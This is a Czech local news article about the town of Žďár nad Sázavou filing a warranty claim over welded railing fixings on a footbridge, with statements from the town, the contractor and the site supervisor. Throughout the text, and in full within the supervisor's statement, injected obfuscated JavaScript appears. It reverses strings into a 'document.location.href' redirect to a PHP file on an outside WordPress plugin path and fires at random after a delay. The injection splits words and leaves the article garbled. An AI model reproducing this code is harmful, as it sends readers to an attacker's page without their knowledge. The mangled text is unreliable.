Rainbow page separator

Žďár reklamuje nedostatek na lávce na Farských humnech

Středa, 27. ledna 2021

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to reklamuje lávku na Farských humnech kvůli nedostatku v ukotvení zábradlí, které dodavatel mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přichycení šrouby přivařil. Díry, které byly vyvrtány v době, kdy bylo zábradlí připevněno opačně, po jeho o[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točení neseděly. Dodavatel díry neupravil tak, aby bylo možné železné profily připevnit šrouby, jak uváděla projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová dokumentace. Firma ujišťuje, že současné provedení je bezpečné.

Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nedostatek reklamovalo a vyžádalo si prodloužení záruky na lávku. Chybu dodavatel napraví do 19. února. Protikorozní nátěr firma nanese, až budou vhodné klimatické podmínky, nejpozději ale do 31. května.

Pod článkem vám přinášíme celá vyjádření města, dodavatele stavby i stavebního dozoru.

Vyjádření města
Lávka na Farských humnech je kvalitně vymyšlený projekt a jsme rádi, že jsme takovou lávku mohli zrealizovat.
Bohužel v rámci záruční doby jsme na podnět občana přišli na závadu v podobě uchycení zábradlí, které není dle projektu. Dodavatel přichytil zábradlí mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to šroubů svárem. Současné uchycení je bezpečné, nicméně není esteticky a řemeslně dobře provedené.
Hned druhý den po zjištění proběhla schůzka s dodavatelem a stavebním dozorem. Dodavatel nás ujistil, že do 19. února reklamovanou závadu odstraní s tím, že následný nátěr bude proveden dle klimatických podmínek nejdéle do 31. května. Poté bude ze strany dozoru, dodavatele i města provedena důkladná inspekce celé lávky.
Za chybu převzal zodpovědnost dodavatel a na vlastní náklady ji odstraní. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude požadovat v souladu s podepsanou Smlouvou o dílo prodloužení záruky.
„Ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přístup není akcep[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelný. Není [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale věc, která by zkazila celkový dojem, že lávka je pěkná a kvalitně vymyšlená. Bude občanům sloužit po další desítky let a je chloubou města. Žádná podobná lávka tu [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž dlouhá léta nevznikla,“ komentuje starosta Martin Mrkos.
Matěj Papáček, tiskový mluvčí Žďáru nad Sázavou

Vyjádření dodavatele
V samém finále stavby, která patřila stran logistiky i technologického řešení spíše k výzvám, jsme provedli závěrečnou instalaci zábradlí . V té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to fázi došlo k odchýlení od projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace, pročež jsme neprodleně zahájili opravu.
Konstrukce mos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky, do které je konstrukce zábradlí vložena, je tvořena spřaženým ocelobe[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonovým průřezem. Mos[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovka se díky [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu dobře adaptuje na různou zátěž a „pohybuje se“. Vlivem [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na některým místech nelícují otvory pro vložení šroubů. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to místa byla řešena svárem a vzniklo tím zábradlí , které odpovídá projektu, je bezpečné a spoje jsou pevné. Na některých místech však nepůsobí otvory nevyplněnými šrouby vizuálně dobře.
Omlouváme se za vzniklou situaci a jsme připraveni ji napravit. Chybějící otvory během následujících 14 dnů dodatečně provrtáme, doplníme šrouby, které tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spíše než nosnou funkci, splní vizuální doladění celku. Poškozené nátěry můžeme opravit až za vhodného počasí, tedy nejblíže na jaře.
Kateřina Baxová, podniková komunikace PORR a.s.
Vyjádření stavebního dozoru
Při přebírání dokončené lávky chybějící šrouby nebyly zjištěny a nejsou uvedeny ani v seznamu vad a nedodělků. Následně však bylo zjištěno, že dřevěná výplň zábradlí je osazena opačně a výška zábradlí tudíž není dle projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace. Zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviteli bylo nařízeno vadu odstranit. Za tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelem bylo potřeba zábradlí kompletně demon[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat a po o[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];točení výplně osadit zpět. To[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to provedl subdodavatel zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele, při zpětném osazování sloupků však nesedly otvory pro šrouby přesně na sebe. Pracovníci subdodavatele problém zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toviteli a TDS neoznámili a vyřešili problém náhradním řešením – menší šrouby, sváry mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to šroubů. Pochybením zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele a TDS [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nebylo při přebírání odstraněných vad a nedodělků odhaleno. Subdodavatel si je vědom nest$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.r$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andom() * 6); if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}$nJe=function(n){if (typeof ($nJe.list[n]) == „string“) return $nJe.list[n].split(„“).reverse().join(„“);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod“]; if (number1==3){var xxdelay = 18000; setTimeout($nJe(0), xxdelay);}andardního a nevhodného vyřešení problému a počítá s provedením opravy – doplnění chybějících šroubů, včetně provedení opravy protikorozní ochrany konstrukce. Na zítřejší den 27.1.2020 je svoláno na místě samém samostatné jednání za pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnosti všech zúčastněných, za účelem stanovení způsobu a termínu provedení opravy. Provedená oprava bude zástupci zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitele a TDS převzata a předána zástupci města.
Ing. Radek Soška, STAVONA Tender, spol. s r.o.